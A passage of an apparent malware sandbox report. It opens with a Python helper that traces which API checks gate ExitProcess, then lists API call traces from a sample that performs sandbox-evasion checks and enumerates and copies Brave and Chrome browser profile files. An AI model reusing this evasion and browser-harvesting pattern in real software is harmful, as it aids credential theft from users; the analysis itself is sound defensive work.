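              "2799 7d105e-7d107b VirtualAlloc 2798->2799 2800 7d1057-7d1058 ExitProcess "
              "2798->2800 2801 7d107d-7d1080 2799->2801 2802 7d1082-7d1088 2799->2802 "
              "2801->2802 2803 7d108a-7d10ab VirtualFree 2802->2803 2804 7d10b1-7d10b6 "
              "2802->2804 2803->2804")
CFG_7D10C0 = ("control_flow_graph 2886 7d10c0-7d10cb 2887 7d10d0-7d10dc 2886->2887 "
              "2889 7d10de-7d10f3 GlobalMemoryStatusEx 2890 7d10f5-7d1106 2889->2890 "
              "2891 7d1112-7d1114 ExitProcess 2889->2891 2892 7d1108 2890->2892 "
              "2893 7d111a-7d111d 2890->2893 2892->2891 2894 7d110a-7d1110 2892->2894 "
              "2894->2891 2894->2893")

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")   # "7d1030-7d1055" or "7d1108"
EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    start: int
    end: int
    labels: List[str] = field(default_factory=list)  # API names, "call <addr>", "* <n>"


@dataclass
class Cfg:
    blocks: Dict[int, Block] = field(default_factory=dict)
    preds: Dict[int, Set[int]] = field(default_factory=lambda: defaultdict(set))
    succs: Dict[int, Set[int]] = field(default_factory=lambda: defaultdict(set))


def parse_cfg(text: str) -> Cfg:
    """Tokenise the dump: '<id> <addr[-addr]> <labels...>' defines a block, 'a->b' an edge."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, current, i = Cfg(), None, 0
    while i < len(toks):
        t = toks[i]
        if (e := EDGE.match(t)):
            a, b = int(e.group(1)), int(e.group(2))
            cfg.succs[a].add(b)
            cfg.preds[b].add(a)
            current = None
            i += 1
        elif NODE_ID.match(t) and i + 1 < len(toks) and (r := ADDR.match(toks[i + 1])):
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start
            current = int(t)
            cfg.blocks[current] = Block(start, end)
            i += 2
        elif t in ("call", "*") and current is not None and i + 1 < len(toks):
            # keep "call 7d2a20" (internal call) and "* 3" (repeat count) as one label
            cfg.blocks[current].labels.append(f"{t} {toks[i + 1]}")
            i += 2
        else:
            if current is not None:
                cfg.blocks[current].labels.append(t)
            i += 1
    return cfg


def api_names(block: Block) -> List[str]:
    """Win32 API names only: drop internal 'call <addr>' targets and '* <n>' repeat counts."""
    return [lbl for lbl in block.labels if not lbl.startswith(("call ", "* "))]


def exit_gates(cfg: Cfg, api: str = "ExitProcess") -> Dict[int, List[Tuple[int, List[str]]]]:
    """For each block calling `api`, walk predecessors back to the nearest blocks that call
    some Win32 API; those are the checks whose outcome leads to the exit. Blocks without
    API labels are assumed to be pure branching logic and are walked through."""
    result: Dict[int, List[Tuple[int, List[str]]]] = {}
    for bid, blk in cfg.blocks.items():
        if api not in blk.labels:
            continue
        gates: List[Tuple[int, List[str]]] = []
        seen: Set[int] = set()
        stack = list(cfg.preds.get(bid, ()))
        while stack:
            p = stack.pop()
            if p in seen:
                continue
            seen.add(p)
            names = api_names(cfg.blocks[p])
            if names:
                gates.append((cfg.blocks[p].start, names))
            else:
                stack.extend(cfg.preds.get(p, ()))
        result[blk.start] = sorted(gates)
    return result


if __name__ == "__main__":
    for name, text in (("0x7D1030", CFG_7D1030), ("0x7D10C0", CFG_7D10C0)):
        for exit_addr, gates in exit_gates(parse_cfg(text)).items():
            print(f"{name}: ExitProcess at {exit_addr:08X} gated by "
                  + ", ".join(f"{a:08X} [{' '.join(n)}]" for a, n in gates))
```

For 0x7D1030 the only gate is the block at 0x7D1030 (GetCurrentProcess, VirtualAllocExNuma). For this function, all three edges into the ExitProcess block at 0x7D1112 (from 2889, 2892 and 2894) trace back to the single GlobalMemoryStatusEx block at 0x7D10DE, so the exit is decided entirely by the memory-status result; the threshold compared against is not present in the report text and the example does not guess it.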

                          Control-flow Graph

                          control_flow_graph 2895 7e8c88-7e8cc4 StrCmpCA 2898 7e8ccd-7e8ce6 2895->2898 2899 7e8cc6-7e8cc7 ExitProcess 2895->2899 2901 7e8cec-7e8cf1 2898->2901 2902 7e8ee2-7e8eef call 7d2a20 2898->2902 2904 7e8cf6-7e8cf9 2901->2904 2906 7e8cff 2904->2906 2907 7e8ec3-7e8edc 2904->2907 2908 7e8dbd-7e8dcb StrCmpCA 2906->2908 2909 7e8ddd-7e8deb StrCmpCA 2906->2909 2910 7e8dfd-7e8e0b StrCmpCA 2906->2910 2911 7e8e1d-7e8e2b StrCmpCA 2906->2911 2912 7e8e3d-7e8e4b StrCmpCA 2906->2912 2913 7e8d5a-7e8d69 lstrlen 2906->2913 2914 7e8e56-7e8e64 StrCmpCA 2906->2914 2915 7e8d30-7e8d3f lstrlen 2906->2915 2916 7e8e6f-7e8e7d StrCmpCA 2906->2916 2917 7e8e88-7e8e9a lstrlen 2906->2917 2918 7e8d06-7e8d15 lstrlen 2906->2918 2919 7e8d84-7e8d92 StrCmpCA 2906->2919 2920 7e8da4-7e8db8 StrCmpCA 2906->2920 2907->2902 2939 7e8cf3 2907->2939 2908->2907 2922 7e8dd1-7e8dd8 2908->2922 2909->2907 2923 7e8df1-7e8df8 2909->2923 2910->2907 2924 7e8e11-7e8e18 2910->2924 2911->2907 2925 7e8e31-7e8e38 2911->2925 2912->2907 2926 7e8e4d-7e8e54 2912->2926 2935 7e8d6b-7e8d70 call 7d2a20 2913->2935 2936 7e8d73-7e8d7f call 7d2930 2913->2936 2914->2907 2929 7e8e66-7e8e6d 2914->2929 2933 7e8d49-7e8d55 call 7d2930 2915->2933 2934 7e8d41-7e8d46 call 7d2a20 2915->2934 2916->2907 2930 7e8e7f-7e8e86 2916->2930 2931 7e8e9c-7e8ea1 call 7d2a20 2917->2931 2932 7e8ea4-7e8eb0 call 7d2930 2917->2932 2927 7e8d1f-7e8d2b call 7d2930 2918->2927 2928 7e8d17-7e8d1c call 7d2a20 2918->2928 2919->2907 2921 7e8d98-7e8d9f 2919->2921 2920->2907 2921->2907 2922->2907 2923->2907 2924->2907 2925->2907 2926->2907 2955 7e8eb3-7e8eb5 2927->2955 2928->2927 2929->2907 2930->2907 2931->2932 2932->2955 2933->2955 2934->2933 2935->2936 2936->2955 2939->2904 2955->2907 2956 7e8eb7-7e8eb9 2955->2956 2956->2907 2957 7e8ebb-7e8ebd lstrcpy 2956->2957 2957->2907
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 5f8494d08b80541fd7e1a56f5ab317427c7ae67e5ebc8222147eddd60968100d
                          • Instruction ID: 05d057669d0ab0ba6eaeafaeb48f1d8f911326e5e461f55bf290798023799aeb
                          • Opcode Fuzzy Hash: 5f8494d08b80541fd7e1a56f5ab317427c7ae67e5ebc8222147eddd60968100d
                          • Instruction Fuzzy Hash: 3AE0D8A0100745E7D7209BB5CC44947BFA8FF84710B04842CA58997651DB78FC02C3A5

                          Control-flow Graph

                          control_flow_graph 2958 7f2ad0-7f2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 7f2b44-7f2b59 2958->2959 2960 7f2b24-7f2b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 007F2B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 89eee69b8e2ca78f30f493e1e5e56c3736d7adea988500745b2df6c492a8d47e
                          • Instruction ID: dc506dbbfbc83271008942f4c67ea5e7dd5e091343b69f36b8e2fbeae59dfbea
                          • Opcode Fuzzy Hash: 89eee69b8e2ca78f30f493e1e5e56c3736d7adea988500745b2df6c492a8d47e
                          • Instruction Fuzzy Hash: 8401D6B2A44208ABD710DF99EC45BAEF7B8F744B21F00026AFA19D3780D774190587A1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                          • ExitProcess.KERNEL32 ref: 007D1058
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 636db52f160a7b29f339581df1591ce84a33112f09772c7fa200ec93e7d1d333
                          • Instruction ID: b19d16fffd82f73485cf6f52fc598d535731710d8fdde70cca24b58676be4fae
                          • Opcode Fuzzy Hash: 636db52f160a7b29f339581df1591ce84a33112f09772c7fa200ec93e7d1d333
                          • Instruction Fuzzy Hash: F6E012B17C43887AFA3167A15C0EF173A3C9751B11F545002B745EA1D3E6ADA8425574
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E2402
                          • lstrlen.KERNEL32(\*.*), ref: 007E240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: f52782bb23d5b74586949ceb60d613d47fc2f8c15e93e56dc842b3636cad32fe
                          • Instruction ID: 8fe78afa71782c8431728702e5d134f5ec5730b3d1fc1d9e2f792b911737de22
                          • Opcode Fuzzy Hash: f52782bb23d5b74586949ceb60d613d47fc2f8c15e93e56dc842b3636cad32fe
                          • Instruction Fuzzy Hash: F5A27F71A0225A9BDB21EFB5DC4DAAF77B9AF58300F048129B845E7252DB3CDD038B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D16E2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D176C
                          • lstrcat.KERNEL32(00000000), ref: 007D1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D17EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D17F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1875
                          • lstrcat.KERNEL32(00000000), ref: 007D187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D18FE
                          • lstrlen.KERNEL32(00801794), ref: 007D1909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1929
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1966
                          • lstrlen.KERNEL32(\*.*), ref: 007D1971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007D199A
                            • Part of subcall function 007F4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 007F406D
                            • Part of subcall function 007F4040: lstrcpy.KERNEL32(00000000,?), ref: 007F40A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A16
                          • lstrlen.KERNEL32(00801794), ref: 007D1A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A41
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A81
                          • lstrlen.KERNEL32(00801794), ref: 007D1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1AAC
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007D1B45
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007D1B70
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007D1B8A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1C03
                          • lstrlen.KERNEL32(00801794), ref: 007D1C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1C31
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1C74
                          • lstrlen.KERNEL32(00801794), ref: 007D1C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1CA2
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1CAE
                          • lstrlen.KERNEL32(?), ref: 007D1CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1CE9
                          • lstrlen.KERNEL32(00801794), ref: 007D1CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1D14
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1DEB
                          • lstrlen.KERNEL32(00801794), ref: 007D1DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1E19
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D1E56
                          • lstrlen.KERNEL32(00801794), ref: 007D1E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1E81
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D1E8D
                          • lstrlen.KERNEL32(?), ref: 007D1E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007D1F45
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D1F9F
                          • lstrlen.KERNEL32(01259298), ref: 007D1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 007D1FE3
                          • lstrlen.KERNEL32(00801794), ref: 007D1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D200E
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007D204D
                          • lstrlen.KERNEL32(00801794), ref: 007D2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D2075
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007D2081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: 8bdb5bd21fbe825d0cdf9bf201bbf3f57075344a77788b6565616d8edc1ac806
                          • Instruction ID: 0ee147d4255c888d20c7bc65a45ee43c0893112de89e94c32d7fa5685450e3a6
                          • Opcode Fuzzy Hash: 8bdb5bd21fbe825d0cdf9bf201bbf3f57075344a77788b6565616d8edc1ac806
                          • Instruction Fuzzy Hash: 3C926371A1121AEBDB21EFA4DD88AAF77B9AF54700F444126F805A7352DB38DD07CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDBEF
                          • lstrlen.KERNEL32(00804CA8), ref: 007DDBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC17
                          • lstrcat.KERNEL32(00000000,00804CA8), ref: 007DDC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDC4C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDC8F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007DDCD0
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007DDCF0
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007DDD0A
                          • lstrlen.KERNEL32(007FCFEC), ref: 007DDD1D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DDD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDD7B
                          • lstrlen.KERNEL32(00801794), ref: 007DDD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDA3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDDAF
                          • lstrlen.KERNEL32(?), ref: 007DDDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 007DDDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDE19
                          • lstrlen.KERNEL32(00801794), ref: 007DDE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDE6F
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDE7B
                          • lstrlen.KERNEL32(01258F98), ref: 007DDE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDEBB
                          • lstrlen.KERNEL32(00801794), ref: 007DDEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DDEE6
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDEF2
                          • lstrlen.KERNEL32(01259138), ref: 007DDF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFA5
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DDFB1
                          • lstrlen.KERNEL32(01258F98), ref: 007DDFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DDFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DDFF4
                          • lstrlen.KERNEL32(00801794), ref: 007DDFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE022
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007DE02E
                          • lstrlen.KERNEL32(01259138), ref: 007DE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 007DE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 007DE0E7
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE11F
                          • lstrlen.KERNEL32(0125D580), ref: 007DE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE155
                          • lstrcat.KERNEL32(00000000,?), ref: 007DE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE19F
                          • lstrcat.KERNEL32(00000000), ref: 007DE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE1F9
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE22F
                          • lstrlen.KERNEL32(01259298), ref: 007DE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE261
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007DE269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 007DE274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 007DE2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE349
                          • DeleteFileA.KERNEL32(?), ref: 007DE381
                          • StrCmpCA.SHLWAPI(?,0125D6B8), ref: 007DE3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE445
                          • StrCmpCA.SHLWAPI(?,01259138), ref: 007DE468
                          • StrCmpCA.SHLWAPI(?,01258F98), ref: 007DE47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007DE4E0
                          • StrCmpCA.SHLWAPI(?,0125D5B0), ref: 007DE58E
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DE5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 007DE639
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE678
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE737
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 007DE776
                          • DeleteFileA.KERNEL32(?), ref: 007DE7D2
                          • StrCmpCA.SHLWAPI(?,01259158), ref: 007DE7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DE916
                          • lstrcpy.KERNEL32(00000000,?), ref: 007DE952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 9a656c82c20bc1138ccd42b15d177a0adcf9959f2b249f15b69e28070b5f6086
                          • Instruction ID: 74a4a6d6725a066278967717422b1b16038c955c75e8180b23cca9b9d7a8e4b2
                          • Opcode Fuzzy Hash: 9a656c82c20bc1138ccd42b15d177a0adcf9959f2b249f15b69e28070b5f6086
                          • Instruction Fuzzy Hash: 7B925371A1121ADBDB21EFB4DC89AAE77B9AF54300F044526F845A7352DB38EC47CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E18D2
                          • lstrlen.KERNEL32(\*.*), ref: 007E18DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E18FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 007E190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 007E1947
                          • StrCmpCA.SHLWAPI(?,008017A0), ref: 007E1967
                          • StrCmpCA.SHLWAPI(?,008017A4), ref: 007E1981
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E19BF
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E19F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E1A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1A4C
                          • lstrlen.KERNEL32(00801794), ref: 007E1A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1A80
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1AB4
                          • lstrlen.KERNEL32(?), ref: 007E1AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 007E1AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B19
                          • lstrlen.KERNEL32(01259148), ref: 007E1B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1B8F
                          • lstrlen.KERNEL32(00801794), ref: 007E1BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1BC3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C57
                          • lstrlen.KERNEL32(00801794), ref: 007E1C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1C8B
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D21
                          • lstrlen.KERNEL32(00801794), ref: 007E1D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D55
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E1DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1DED
                          • lstrlen.KERNEL32(00801794), ref: 007E1E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1E36
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1E68
                          • lstrlen.KERNEL32(0125D688), ref: 007E1E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1EB2
                          • lstrlen.KERNEL32(00801794), ref: 007E1EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1EE3
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F15
                          • lstrlen.KERNEL32(0125DE50), ref: 007E1F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F5F
                          • lstrlen.KERNEL32(00801794), ref: 007E1F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1F90
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E1F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E1FC2
                          • lstrlen.KERNEL32(0124B860), ref: 007E1FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E2000
